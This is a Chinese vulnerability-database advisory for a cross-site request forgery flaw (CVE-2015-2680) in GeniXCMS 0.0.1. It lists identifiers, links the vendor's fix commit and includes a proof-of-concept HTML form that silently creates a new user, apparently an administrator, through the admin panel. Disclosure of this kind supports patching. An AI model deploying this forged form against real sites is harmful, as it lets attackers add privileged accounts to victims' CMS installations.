GeniXCMS 0.0.1 /index.php CSRF漏洞

基本字段

漏洞编号:
SSV-89456
披露/发现时间:
2015-03-23
提交时间:
2015-09-17
漏洞等级:
漏洞类别:
跨站请求伪造
影响组件:
GeniXCMS
漏洞作者:
未知
提交者:
Disorder
CVE-ID:
CVE-2015-2680
CNNVD-ID:
CNNVD-201503-425
CNVD-ID:
CNVD-2015-01953
ZoomEye Dork:
补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Disorder 共获得   2.95KB
1
2
3
4
5
6
7
8
9
10
11
12
13
<html>
<body>
<form action="http://localhost/genixcms/gxadmin/index.php?page=users" method="POST">
<input type="hidden" name="userid" value="Testingus" />
<input type="hidden" name="pass1" value="123456" />
<input type="hidden" name="pass2" value="123456" />
<input type="hidden" name="email" value="t00t@zeroscience.eu" />
<input type="hidden" name="group" value="0" />
<input type="hidden" name="adduser" value="" />
<input type="submit" value="Forge!" />
</form>
</body>
</html>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

flsf @mb1Dex GurdZain 等 16 兑换

参考链接

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

官方已发布新版本,请升级最新版 https://github.com/semplon/GeniXCMS/commit/698245488343396185b1b49e7482ee5b25541815

防护方案

暂无防护方案

人气 1511
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负